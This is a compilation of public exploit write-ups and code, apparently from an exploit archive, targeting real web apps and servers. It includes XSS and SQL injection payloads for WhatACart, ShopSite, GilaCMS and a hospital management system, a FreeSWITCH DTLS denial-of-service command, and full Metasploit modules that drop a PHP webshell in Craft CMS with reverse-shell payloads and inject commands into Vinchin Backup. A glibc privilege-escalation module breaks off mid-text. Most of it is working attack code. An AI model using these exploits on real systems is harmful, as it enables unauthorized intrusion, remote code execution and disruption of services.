<pre><code># Exploit Title: WhatACart Version: 2.0.7 - Reflected XSS<br /># Date: 2023-12-27<br /># Exploit Author: tmrswrr<br /># Category : Webapps<br /># Vendor Homepage: https://whatacart.com<br /># Version: 2.0.7<br /># Tested on: https://whatacart.com/demo<br /><br /><br />1 ) Go to this page : https://demo.whatacart.com/<br />2 ) Write search field this payload : <sVg/onLy=1 onLoaD=confirm(1)//<br />3 ) You will bee alert button : https://demo.whatacart.com/site/default/search?keyword=%3CsVg%2FonLy%3D1+onLoaD%3Dconfirm(document.cookie)%2F%2F&navsearch=<br /></code></pre>
<pre><code># Exploit Title: ShopSite Version: 14.0 - Stored XSS<br /># Date: 2023-12-25<br /># Exploit Author: tmrswrr<br /># Category : Webapps<br /># Vendor Homepage: https://www.shopsite.com/<br /># Version: 14.0<br /># Tested on: https://www.shopsite.com/demo.html<br /><br /><br /><br />1 ) Upload poc.svg file here : https://demo.shopsite.com/cgi-bin/ssdemos/stores/alsdemo/ss/mediam.cgi<br /><br />poc.svg<br /><br /><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 500 500"><br /> <script>//<![CDATA[<br /> alert(document.domain)<br /> //]]><br /> </script><br /></svg><br /><br /><br />2 ) Check here will be see alert button : https://a-demo-store.com/ssdemos/stores/alsdemo3/media/ss_sunglasses/aaa.svg<br /></code></pre>
<pre><code># FreeSWITCH susceptible to Denial of Service via DTLS Hello packets during call initiation<br /><br />- Fixed versions: 1.10.11<br />- Enable Security Advisory: https://github.com/EnableSecurity/advisories/tree/master/ES2023-02-freeswitch-dtls-hello-race<br />- Vendor Security Advisory: https://github.com/signalwire/freeswitch/security/advisories/GHSA-39gv-hq72-j6m6<br />- Other references: CVE-2023-51443<br />- Tested vulnerable versions: 1.10.10<br />- Timeline:<br /> - Report date: 2023-09-27<br /> - Triaged: 2023-09-27<br /> - Fix provided for testing: 2023-09-29<br /> - Vendor release with fix: 2023-12-22<br /> - Enable Security advisory: 2023-12-22<br /><br />## TL;DR<br /><br />When handling DTLS-SRTP for media setup, FreeSWITCH is susceptible to Denial of Service due to a race condition in the hello handshake phase of the DTLS protocol. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack.<br /><br />## Description<br /><br />Our research has shown that key establishment for Secure Real-time Transport Protocol (SRTP) using Datagram Transport Layer Security Extension (DTLS)[^1] is susceptible to a Denial of Service attack due to a race condition. If an attacker manages to send a ClientHello DTLS message with an invalid CipherSuite (such as `TLS_NULL_WITH_NULL_NULL`) to the port on the FreeSWITCH server that is expecting packets from the caller, a DTLS error is generated. This results in the media session being torn down, which is followed by teardown at signaling (SIP) level too.<br /><br />This behavior was tested against FreeSWITCH version 1.10.10, which was found to be vulnerable to this issue.<br /><br />The following sequence diagram shows the normal flow (i.e. no attack) involving SIP and DTLS messages between a UAC (the Caller) and an FreeSWITCH server capable of handling WebRTC calls.<br /><br />Diagram showing a call setup against FreeSWITCH that uses SIP and DTLS:<br />https://user-images.githubusercontent.com/4557407/271063734-85425e09-6945-49b1-ba73-751b6d592ea4.png<br /><br />In a controlled experiment, it was observed that when the Attacker sent a DTLS ClientHello to FreeSWITCH's media port from a different IP and port, FreeSWITCH responded by sending a DTLS Alert to the Caller. Additionally, FreeSWITCH terminated the SIP call by sending a BYE message to the Caller.<br /><br />Diagram showing a call setup against FreeSWITCH that fails due to an attacker controlled DTLS ClientHello:<br />https://user-images.githubusercontent.com/4557407/271064011-032f9a0e-15af-4645-b008-1fe8b706d75e.png<br /><br />During a real attack, the attacker would spray a vulnerable FreeSWITCH server with DTLS ClientHello messages. The attacker would typically target the range of UDP ports allocated for RTP. When the ClientHello message from the Attacker wins the race against an expected ClientHello from the Caller, the call terminates, resulting in Denial of Service.<br /><br /><br />## Impact<br /><br />Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable FreeSWITCH servers for calls that rely on DTLS-SRTP.<br /><br />## How to reproduce the issue<br /><br />1. Prepare a FreeSWITCH server with an extension configured to handle WebRTC<br />1. Send an INVITE message to the target server with WebRTC SDP:<br /><br /> ```default<br /> INVITE sip:1000@192.168.1.202 SIP/2.0<br /> Via: SIP/2.0/WSS 192.168.1.202:36742;rport=36742;branch=z9hG4bK-jQcnXJadB2VGfGmQ<br /> Max-Forwards: 70<br /> From: <sip:1000@192.168.1.202>;tag=L9kc5NfpYG1u67cT<br /> To: <sip:1000@192.168.1.202><br /> Contact: <sip:1000@192.168.1.202><br /> Call-ID: DzGnBLt0z9SK3MC0<br /> CSeq: 5 INVITE<br /> Content-Type: application/sdp<br /> Content-Length: 385<br /><br /> v=0<br /> o=- 1695296331 1695296331 IN IP4 192.168.1.202<br /> s=-<br /> t=0 0<br /> c=IN IP4 192.168.1.202<br /> m=audio 45825 UDP/TLS/RTP/SAVPF 0 8 101<br /> a=setup:active<br /> a=fingerprint:sha-256 49:05:98:B2:15:43:1C:9C:4F:29:07:60:F8:63:77:16:80:F9:44:C0:97:8E:E5:48:D6:71:B4:03:10:85:D6:E3<br /> a=rtpmap:0 PCMU/8000/1<br /> a=rtpmap:8 PCMA/8000/1<br /> a=rtpmap:101 telephone-event/8000<br /> a=rtcp-mux<br /> a=rtcprsize<br /> a=sendrecv<br /> ```<br />1. Note FreeSWITCH's media port and IP values, which will be used as the `<freeswitch-ip>` and `<media-port>` parameters by the Attacker<br />1. Send a DTLS ClientHello message from a (attacker-controlled) host, which is different from the Caller but has network access to the FreeSWITCH server<br /><br /> ```bash<br /> CLIENT_HELLO="Fv7/AAAAAAAAAAAAfAEAAHAAAAAAAAAAcP79AAA" <br /> CLIENT_HELLO="${CLIENT_HELLO}AAG4HCVaUNVbYVmxuqdn2WyCgtTijhZ+WheP/+H"<br /> CLIENT_HELLO="${CLIENT_HELLO}4AAAACAAABAABEABcAAP8BAAEAAAoACAAGAB0AF"<br /> CLIENT_HELLO="${CLIENT_HELLO}wAYAAsAAgEAACMAAAANABQAEgQDCAQEAQUDCAUF"<br /> CLIENT_HELLO="${CLIENT_HELLO}AQgGBgECAQAOAAkABgABAAgABwA="<br /> echo -n "${CLIENT_HELLO}" | base64 --decode | nc -u <freeswitch-ip> <media-port><br /> ```<br />1. Observe that the Caller received a DTLS Alert message and a SIP BYE message on its signaling channel<br /><br />Note that the above steps are used to reliably reproduce the vulnerability. In case of a real attack, the attacker simply has to spray the FreeSWITCH server with DTLS messages.<br /><br />## Solution and recommendations<br /><br />To address this vulnerability, upgrade FreeSWITCH to the latest version which includes the security fix. The solution implemented is to drop all packets from addresses that have not been validated by an ICE check.<br /><br />## About Enable Security<br /><br />[Enable Security](https://www.enablesecurity.com) develops offensive security tools and provides quality penetration testing to help protect your real-time communications systems against attack.<br /><br />## Disclaimer<br /><br />The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.<br /><br />## Disclosure policy<br /><br />This report is subject to Enable Security's vulnerability disclosure policy which can be found at <https://github.com/EnableSecurity/Vulnerability-Disclosure-Policy>.<br /><br />[^1]: Datagram Transport Layer Security (DTLS) Extension to Establish Keys for the Secure Real-time Transport Protocol (SRTP) https://datatracker.ietf.org/doc/html/rfc5764<br /><br />--<br /> <br /> Sandro Gauci, CEO at Enable Security GmbH<br /><br /> Register of Companies: AG Charlottenburg HRB 173016 B<br /> Company HQ: Neuburger Straße 101 b, 94036 Passau, Germany<br /> RTCSec Newsletter: https://www.rtcsec.com/subscribe<br /> Our blog: https://www.rtcsec.com<br /> Other points of contact: https://www.enablesecurity.com/contact/<br /><br /></code></pre>
<pre><code>Description: GilaCMS <=1.15.4 - Mutiple SQL injection vulnerabilties<br />Affected CMS: GilaCMS<br />Affected Version: <= 1.15.4<br />CVE ID: CVE-2020-26623, CVE-2020-26624, CVE-2020-26625<br />CVSS Score: 7.2 (High)<br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H<br />Discoverers: Chris Chan @ UDomain Web Hosting Co.Ltd, Louise Ng @ UDomain Web Hosting Co.Ltd<br /><br />Multiple SQL injection vulnerabilities were discovered in Gila CMS 1.15.4 and before which allows a remote attacker to execute arbitary web scripts.<br />Proof of Concept:<br />Attack Vector 1:<br />After login into admin portal, go to administration>widget and use wiget area filter to perform search<br />Sample payload:<br />http://targeturl/cm/list_rows/widget?page=1&area=dashboard'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,@@version,NULL--%20<br /><br />Attack Vector 2:<br />After login into admin portal, go to edit post/page/role/user/category/userpost<br />Sample payload:<br />http://targeturl/cm/edit_form/userrole?id=2'%20and%201%3d0%20UNION%20ALL%20SELECT%20@@version,NULL,NULL--%20&callback=g_form_popup_update<br />http://targeturl/cm/edit_form/user?id=1'%20and%201%3d0%20UNION%20ALL%20SELECT%20NULL,@@version,NULL,NULL,NULL,NULL,NULL--%20<br />http://targeturl/cm/edit_form/page?id=7'%20and%201%3d0%20%20UNION%20ALL%20SELECT%20NULL,@@version,NULL,NULL,NULL--%20<br />http://targeturl/cm/edit_form/post?id=3'%20and%201%3d0%20%20UNION%20ALL%20SELECT%20@@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20%20&callback=g_form_popup_update<br />http://targeturl/cm/edit_form/postcategory?id=11'%20%20and%201%3d0%20UNION%20ALL%20SELECT%20NULL,NULL,@@version--%20&callback=g_form_popup_update<br />http://targeturl/cm/edit_form/user-post?id=3'%20and%201%3d0%20%20UNION%20ALL%20SELECT%20@@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20&callback=g_form_popup_update<br /><br />Attacker Vector 3:<br />After login into admin portal, go to Content>Posts and use Users filter to perform search<br />Sample payload:<br />http://targeturl/cm/list_rows/post?page=1&user_id=1'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,@@version,NULL--%20<br /><br />Recommendation<br />Update to v2.0.1<br /><br />http://gilacms.com<br />https://github.com/GilaCMS/gila<br />https://github.com/GilaCMS/gila/security/policy<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> include Msf::Exploit::FileDropper<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Craft CMS unauthenticated Remote Code Execution (RCE)',<br /> 'Description' => %q{<br /> This module exploits Remote Code Execution vulnerability (CVE-2023-41892) in Craft CMS which is a popular<br /> content management system. Craft CMS versions between 4.0.0-RC1 - 4.4.14 are affected by this vulnerability<br /> allowing attackers to execute arbitrary code remotely, potentially compromising the security and integrity<br /> of the application.<br /><br /> The vulnerability occurs using a PHP object creation in the `\craft\controllers\ConditionsController` class<br /> which allows to run arbitrary PHP code by escalating the object creation calling some methods available in<br /> `\GuzzleHttp\Psr7\FnStream`. Using this vulnerability in combination with The Imagick Extension and MSL which<br /> stands for Magick Scripting Language, a full RCE can be achieved. MSL is a built-in ImageMagick language that<br /> facilitates the reading of images, performance of image processing tasks, and writing of results back<br /> to the filesystem. This can be leveraged to create a dummy image containing malicious PHP code using the<br /> Imagick constructor class delivering a webshell that can be accessed by the attacker, thereby executing the<br /> malicious PHP code and gaining access to the system.<br /><br /> Because of this, any remote attacker, without authentication, can exploit this vulnerability to gain<br /> access to the underlying operating system as the user that the web services are running as (typically www-data).<br /> },<br /> 'Author' => [<br /> 'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Metasploit module<br /> 'Thanh', # discovery<br /> 'chybeta' # poc<br /> ],<br /> 'References' => [<br /> [ 'CVE', '2023-41892' ],<br /> [ 'URL', 'https://blog.calif.io/p/craftcms-rce' ],<br /> [ 'URL', 'https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/' ],<br /> [ 'URL', 'https://github.com/advisories/GHSA-4w8r-3xrw-v25g' ],<br /> [ 'URL', 'https://attackerkb.com/topics/2u7OaYlv1M/cve-2023-41892' ],<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'Platform' => [ 'unix', 'linux', 'php' ],<br /> 'Privileged' => false,<br /> 'Arch' => [ ARCH_CMD, ARCH_PHP, ARCH_X64, ARCH_X86 ],<br /> 'Targets' => [<br /> [<br /> 'PHP',<br /> {<br /> 'Platform' => 'php',<br /> 'Arch' => ARCH_PHP,<br /> 'Type' => :php,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'php/meterpreter/reverse_tcp'<br /> }<br /> }<br /> ],<br /> [<br /> 'Unix Command',<br /> {<br /> 'Platform' => [ 'unix', 'linux' ],<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_cmd,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/reverse_bash'<br /> }<br /> }<br /> ],<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ ARCH_X64, ARCH_X86 ],<br /> 'Type' => :linux_dropper,<br /> 'CmdStagerFlavor' => [ 'wget', 'curl', 'printf', 'bourne' ],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'<br /> }<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DisclosureDate' => '2023-09-13',<br /> 'DefaultOptions' => {<br /> 'SSL' => true,<br /> 'RPORT' => 443<br /> },<br /> 'Notes' => {<br /> 'Stability' => [ CRASH_SAFE ],<br /> 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],<br /> 'Reliability' => [ REPEATABLE_SESSION ]<br /> }<br /> )<br /> )<br /> register_options(<br /> [<br /> OptString.new('TARGETURI', [ true, 'Craft CMS base url', '/' ]),<br /> OptString.new('WEBSHELL', [<br /> false, 'The name of the webshell with extension .php. Webshell name will be randomly generated if left unset.', ''<br /> ]),<br /> OptEnum.new('COMMAND', [ true, 'Use PHP command function', 'passthru', [ 'passthru', 'shell_exec', 'system', 'exec' ]], conditions: %w[TARGET != 0])<br /> ]<br /> )<br /> end<br /><br /> def check_phpinfo<br /> # checks vulnerability running phpinfo() and returns upload_tmp_dir and DOCUMENT_ROOT<br /> @config = { 'upload_tmp_dir' => nil, 'document_root' => nil }<br /><br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(datastore['TARGETURI']),<br /> 'ctype' => 'application/x-www-form-urlencoded',<br /> 'vars_post' => {<br /> 'action' => 'conditions/render',<br /> 'configObject[class]' => 'craft\elements\conditions\ElementCondition',<br /> 'config' => '{"name":"configObject","as ":{"class":"\\\GuzzleHttp\\\Psr7\\\FnStream", "__construct()":{"methods":{"close":"phpinfo"}}}}'<br /> }<br /> })<br /> if res && res.body<br /> # parse HTML to find the upload directory and the document root provided by phpinfo command output<br /> html = res.get_html_document<br /> unless html.blank?<br /> tr_items = html.css('tr td')<br /> tr_items.each_with_index do |item, i|<br /> next if tr_items[i + 1].nil?<br /><br /> if item.text.casecmp?('upload_tmp_dir')<br /> if tr_items[i + 1].text.casecmp?('no value')<br /> @config['upload_tmp_dir'] = '/tmp'<br /> else<br /> @config['upload_tmp_dir'] = tr_items[i + 1].text.strip<br /> end<br /> end<br /> @config['document_root'] = tr_items[i + 1].text.strip if item.text.casecmp?('$_SERVER[\'DOCUMENT_ROOT\']')<br /> end<br /> end<br /> end<br /> end<br /><br /> def upload_webshell<br /> # randomize file name if option WEBSHELL is not set<br /> if datastore['WEBSHELL'].blank?<br /> @webshell_name = "#{Rex::Text.rand_text_alpha(8..16)}.php"<br /> else<br /> @webshell_name = datastore['WEBSHELL'].to_s<br /> end<br /><br /> # select webshell depending on the target setting (PHP or others).<br /> @post_param = Rex::Text.rand_text_alphanumeric(1..8)<br /> @get_param = Rex::Text.rand_text_alphanumeric(1..8)<br /><br /> if target['Type'] == :php<br /> # create the MSL payload<br /> # payload = "<?php @eval(base64_decode($_POST[\'#{@post_param}\']));?>"<br /> payload = <<~EOS<br /> <?xml version="1.0" encoding="UTF-8"?><br /> <image><br /> <read filename="caption:<?php @eval(base64_decode($_POST[\'#{@post_param}\'])); ?>" /><br /> <write filename="info:#{@config['document_root']}/#{@webshell_name}" /><br /> </image><br /> EOS<br /> else<br /> # create the MSL payload<br /> # payload = "<?=#{datastore['COMMAND']}(base64_decode($_POST[\'#{@post_param}\']));?>"<br /> payload = <<~EOS<br /> <?xml version="1.0" encoding="UTF-8"?><br /> <image><br /> <read filename="caption:<?=#{datastore['COMMAND']}(base64_decode($_POST[\'#{@post_param}\'])); ?>" /><br /> <write filename="info:#{@config['document_root']}/#{@webshell_name}" /><br /> </image><br /> EOS<br /> end<br /><br /> # construct multipart form data with Imagick MSL payload<br /> form_data = Rex::MIME::Message.new<br /> form_data.add_part('conditions/render', nil, nil, 'form-data; name="action"')<br /> form_data.add_part('craft\elements\conditions\ElementCondition', nil, nil, 'form-data; name="configObject[class]"')<br /> form_data.add_part('{"name":"configObject","as ":{"class":"Imagick", "__construct()":{"files":"msl:/dev/null"}}}', nil, nil, 'form-data; name="config"')<br /> form_data.add_part(payload, 'text/plain', nil, "form-data; name=\"#{Rex::Text.rand_text_alpha(4..8)}\"; filename=\"#{Rex::Text.rand_text_alpha(4..8)}.msl\"")<br /><br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(datastore['TARGETURI']),<br /> 'ctype' => "multipart/form-data; boundary=#{form_data.bound}",<br /> 'data' => form_data.to_s<br /> })<br /> if res && res.code == 502<br /> # code 502 indicates a successful upload of the MSL payload in upload_tmp_dir (default /tmp unless specified in php.ini)<br /> # next step is to generate the webshell in DOCUMENT_ROOT by executing the Imagick MSL payload<br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(datastore['TARGETURI']),<br /> 'ctype' => 'application/x-www-form-urlencoded',<br /> 'vars_post' => {<br /> 'action' => 'conditions/render',<br /> 'configObject[class]' => 'craft\elements\conditions\ElementCondition',<br /> 'config' => "{\"name\":\"configObject\",\"as \":{\"class\":\"Imagick\", \"__construct()\":{\"files\":\"vid:msl:#{@config['upload_tmp_dir']}/php*\"}}}"<br /> }<br /> })<br /> # code 502 indicates a successful generation of the webshell in DOCUMENT_ROOT<br /> return res&.code == 502<br /> end<br /> false<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> payload = Base64.strict_encode64(cmd)<br /> return send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(datastore['TARGETURI'], @webshell_name),<br /> 'ctype' => 'application/x-www-form-urlencoded',<br /> 'vars_post' => {<br /> @post_param => payload<br /> }<br /> })<br /> end<br /><br /> def on_new_session(session)<br /> # cleanup webshell in DOCUMENT_ROOT<br /> register_files_for_cleanup("#{@config['document_root']}/#{@webshell_name}")<br /><br /> # Imagick plugin generates a php<random chars> file with MSL code in the directory set by<br /> # the PHP ini setting "upload_tmp_dir". This file gets executed to generate the webshell.<br /> # A manual cleanup procedure is required to identify and remove the php* files when the session is established.<br /> if session.type == 'meterpreter'<br /> session.fs.dir.chdir(@config['upload_tmp_dir'].to_s)<br /> clean_files = session.fs.dir.entries<br /> else<br /> clean_files = session.shell_command_token("cd #{@config['upload_tmp_dir']};ls php*").split(' ')<br /> end<br /> unless clean_files.blank?<br /> clean_files.each do |f|<br /> register_files_for_cleanup("#{@config['upload_tmp_dir']}/#{f}") if f.match(/^php+/)<br /> end<br /> end<br /> super<br /> end<br /><br /> def check<br /> check_phpinfo<br /> return CheckCode::Appears unless @config['upload_tmp_dir'].nil? || @config['document_root'].nil?<br /><br /> CheckCode::Safe<br /> end<br /><br /> def exploit<br /> # check if upload_tmp_dir and document_root is already initialized with AutoCheck set otherwise run check_phpinfo<br /> check_phpinfo unless datastore['AutoCheck']<br /> fail_with(Failure::NotVulnerable, 'Could not get required phpinfo. System is likely patched.') if @config['upload_tmp_dir'].nil? || @config['document_root'].nil?<br /> fail_with(Failure::UnexpectedReply, "Webshell #{@webshell_name} upload failed.") unless upload_webshell<br /><br /> print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")<br /> case target['Type']<br /> when :php, :unix_cmd<br /> execute_command(payload.encoded)<br /> when :linux_dropper<br /> execute_cmdstager(linemax: 65536)<br /> end<br /> end<br />end<br /></code></pre>
<pre><code>Description: Mutiple vulnerabilties were discovered in Hospital Management System<br />Affected CMS: Hospital Management System<br />Affected Version: <= 4.0<br />CVE ID: CVE-2020-26627, CVE-2020-26628, CVE-2020-26629, CVE-2020-26630<br />CVSS Score: 7.2 (High)<br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H<br />Discoverers: Chris Chan @ UDomain Web Hosting Co.Ltd, Louise Ng @ UDomain Web Hosting Co.Ltd<br /><br />Multiple vulnerabilities were discovered in Hospital Management System v4.0 and before which allows a remote attacker to execute arbitary web scripts.<br />Proof of Concept:<br />Attack Vector 1 (Time-Based SQL injection):<br />Step 1.) Login admin<br />Step 2.) Go to Conatctus Queries -> unread query -> type something in admin remark (e.g test) and submit<br />Step 3.) Replace the POST body to below payload and server will respond after 5 second.<br />adminremark='/**/AND/**/(SELECT/**/1/**/FROM/**/(SELECT(SLEEP(5)))CXde)/**/AND/**/'a'='a&update=<br /><br />Attack Vector 2 (Time-Based SQL injection):<br />Step 1.) Login admin<br />Step 2.) Go to Doctors -> Doctor Specialization -> Click Submit<br />Step 3.) Replace the POST body to below payload and server will respond after 5 second.<br />doctorspecilization='/**/AND/**/(SELECT/**/1/**/FROM/**/(SELECT(SLEEP(5)))CXde)/**/AND/**/'a'='a&submit=<br /><br />Attack Vector 3 (Cross Site Scripting (XSS)):<br />After attacker login, attacker can append malicious javascript behind their name. Other people will trigger xss when they visit this user.<br />Step 1.) Login patient page<br />Step 2.) Got to My Profile>Edit Profile.<br />Step 3.) Append <ScRiPt >alert("poc")</ScRiPt> behind username and save<br />Step 4.) Other user visit this profile will trigger xss<br /><br />Attacker Vector 4 (Unauthenticated Arbitrary File Upload):<br />The HMS is using a vulnerable jquery file upload. Attacker can upload any file to server and trigger it.<br />Step 1.) upload file with below curl command:<br />curl -i -s -k -X $'POST' \<br /> -H $'Content-Type: multipart/form-data; boundary=a211583f728c46a09ca726497e0a5a9f' -H $'Host: localhost' -H $'Content-Length: 164' \<br /> --data-binary $'--a211583f728c46a09ca726497e0a5a9f\x0d\x0aContent-Disposition: form-data; name=\"files[]\"; filename=\"info.php\"\x0d\x0a\x0d\x0a<?php phpinfo(); ?>\x0d\x0a--a211583f728c46a09ca726497e0a5a9f--' \<br /> $'http://localhost/hsm/hms/admin/vendor/jquery-file-upload//server/php/index.php'<br />Step 2.) visit the url in response and trigger the php file.<br /><br /><br /><br />Recommendation<br />Update to v5.2.0<br /><br />https://phpgurukul.com/contact-us/<br />https://phpgurukul.com/hospital-management-system-in-php<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Vinchin Backup and Recovery Command Injection',<br /> 'Description' => %q{<br /> This module exploits a command injection vulnerability in Vinchin Backup & Recovery<br /> v5.0.*, v6.0.*, v6.7.*, and v7.0.*. Due to insufficient input validation in the<br /> checkIpExists API endpoint, an attacker can execute arbitrary commands as the<br /> web server user.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'Gregory Boddin (LeakIX)', # Vulnerability discovery<br /> 'Valentin Lobstein' # Metasploit module<br /> ],<br /> 'References' => [<br /> ['CVE', '2023-45498'],<br /> ['CVE', '2023-45499'],<br /> ['URL', 'https://blog.leakix.net/2023/10/vinchin-backup-rce-chain/'],<br /> ['URL', 'https://vinchin.com/'] # Vendor URL<br /> ],<br /> 'DisclosureDate' => '2023-10-26',<br /> 'Notes' => {<br /> 'Stability' => [ CRASH_SAFE ],<br /> 'SideEffects' => [ IOC_IN_LOGS ],<br /> 'Reliability' => [ REPEATABLE_SESSION ],<br /> 'AKA' => ['Vinchin Command Injection']<br /> },<br /> 'Platform' => ['linux', 'unix'],<br /> 'Arch' => [ARCH_CMD],<br /> 'Targets' => [<br /> ['Automatic', {}]<br /> ],<br /><br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'SSL' => true,<br /> 'FETCH_WRITABLE_DIR' => '/usr/share/nginx/vinchin/tmp'<br /> },<br /> 'Privileged' => false<br /> )<br /> )<br /> register_options(<br /> [<br /> Opt::RPORT(443),<br /> OptString.new('TARGETURI', [true, 'The base path to the Vinchin Backup & Recovery application', '/']),<br /> OptString.new('APIKEY', [true, 'The hardcoded API key', '6e24cc40bfdb6963c04a4f1983c8af71']),<br /> ]<br /> )<br /> end<br /><br /> def exploit<br /> hex_encoded_payload = payload.encoded.unpack('H*').first<br /> formatted_payload = hex_encoded_payload.scan(/../).map { |x| "\\\\x#{x}" }.join<br /><br /> temp_file = "#{datastore['FETCH_WRITABLE_DIR']}/#{Rex::Text.rand_text_alpha(8)}"<br /> command = "echo -e #{formatted_payload}|tee #{temp_file};chmod 777 #{temp_file};#{temp_file};rm #{temp_file}"<br /> send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(datastore['TARGETURI'], 'api/'),<br /> 'vars_get' => {<br /> 'm' => '30',<br /> 'f' => 'checkIpExists',<br /> 'k' => datastore['APIKEY']<br /> },<br /> 'data' => "p={\"ip\":\"a||#{command}\"}"<br /> })<br /> end<br /><br /> def check<br /> target_uri_path = normalize_uri(target_uri.path, 'login.php')<br /> res = send_request_cgi('uri' => target_uri_path)<br /><br /> return CheckCode::Unknown('Failed to connect to the target.') unless res<br /> return CheckCode::Unknown("Unexpected HTTP response code: #{res.code}") unless res.code == 200<br /><br /> version_pattern = /Vinchin build: (\d+\.\d+\.\d+\.\d+)/<br /> version_match = res.body.match(version_pattern)<br /><br /> unless version_match && version_match[1]<br /> return CheckCode::Unknown('Unable to extract version.')<br /> end<br /><br /> version = Rex::Version.new(version_match[1])<br /> print_status("Detected Vinchin version: #{version}")<br /><br /> if (version >= Rex::Version.new('5.0.0') && version < Rex::Version.new('5.1.0')) ||<br /> (version >= Rex::Version.new('6.0.0') && version < Rex::Version.new('6.1.0')) ||<br /> (version >= Rex::Version.new('6.7.0') && version < Rex::Version.new('6.8.0')) ||<br /> (version >= Rex::Version.new('7.0.0') && version < Rex::Version.new('7.0.2'))<br /> return CheckCode::Appears<br /> else<br /> return CheckCode::Safe<br /> end<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Local<br /> Rank = ExcellentRanking<br /><br /> # includes: is_root?<br /> include Msf::Post::Linux::Priv<br /> # includes: kernel_release<br /> include Msf::Post::Linux::Kernel<br /> # include: get_sysinfo<br /> include Msf::Post::Linux::System<br /> # includes writable?, upload_file, upload_and_chmodx, exploit_data, cd<br /> include Msf::Post::File<br /> # includes register_files_for_cleanup<br /> include Msf::Exploit::FileDropper<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> BUILD_IDS = {<br /> '69c048078b6c51fa8744f3d7cff3b0d9369ffd53' => 561,<br /> '3602eac894717d56555552c84fc6b0e4d6a4af72' => 561,<br /> 'a99db3715218b641780b04323e4ae5953d68a927' => 561,<br /> 'a8daca28288575ffc8c7641d40901b0148958fb1' => 580,<br /> '61ef896a699bb1c2e4e231642b2e1688b2f1a61e' => 560,<br /> '9a9c6aeba5df4178de168e26fe30ddcdab47d374' => 580,<br /> 'e7b1e0ff3d359623538f4ae0ac69b3e8db26b674' => 580,<br /> '956d98a11b839e3392fa1b367b1e3fdfc3e662f6' => 322<br /> }<br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Glibc Tunables Privilege Escalation CVE-2023-4911 (aka Looney Tunables)',<br /> 'Description' => %q{<br /> A buffer overflow exists in the GNU C Library's dynamic loader ld.so while processing the GLIBC_TUNABLES<br /> environment variable. This issue allows an local attacker to use maliciously crafted GLIBC_TUNABLES when<br /> launching binaries with SUID permission to execute code in the context of the root user.<br /><br /> This module targets glibc packaged on Ubuntu and Debian. The specific glibc versions this module targets are:<br /><br /> Ubuntu:<br /> 2.35-0ubuntu3.4 > 2.35<br /> 2.37-0ubuntu2.1 > 2.37<br /> 2.38-1ubuntu6 > 2.38<br /><br /> Debian:<br /> 2.31-13-deb11u7 > 2.31<br /> 2.36-9-deb12u3 > 2.36<br /><br /> Fedora 37 and 38 and other distributions of linux also come packaged with versions of glibc vulnerable to CVE-2023-4911<br /> however this module does not target them.<br /> },<br /> 'Author' => [<br /> 'Qualys Threat Research Unit', # discovery<br /> 'blasty <peter@haxx.in>', # PoC<br /> 'jheysel-r7' # msf module<br /> ],<br /> 'References' => [<br /> ['CVE', '2023-4911'],<br /> ['URL', 'https://haxx.in/files/gnu-acme.py'],<br /> ['URL', 'https://www.qualys.com/2023/10/03/cve-2023-4911/looney-tunables-local-privilege-escalation-glibc-ld-so.txt'],<br /> ['URL', 'https://security-tracker.debian.org/tracker/CVE-2023-4911'],<br /> ['URL', 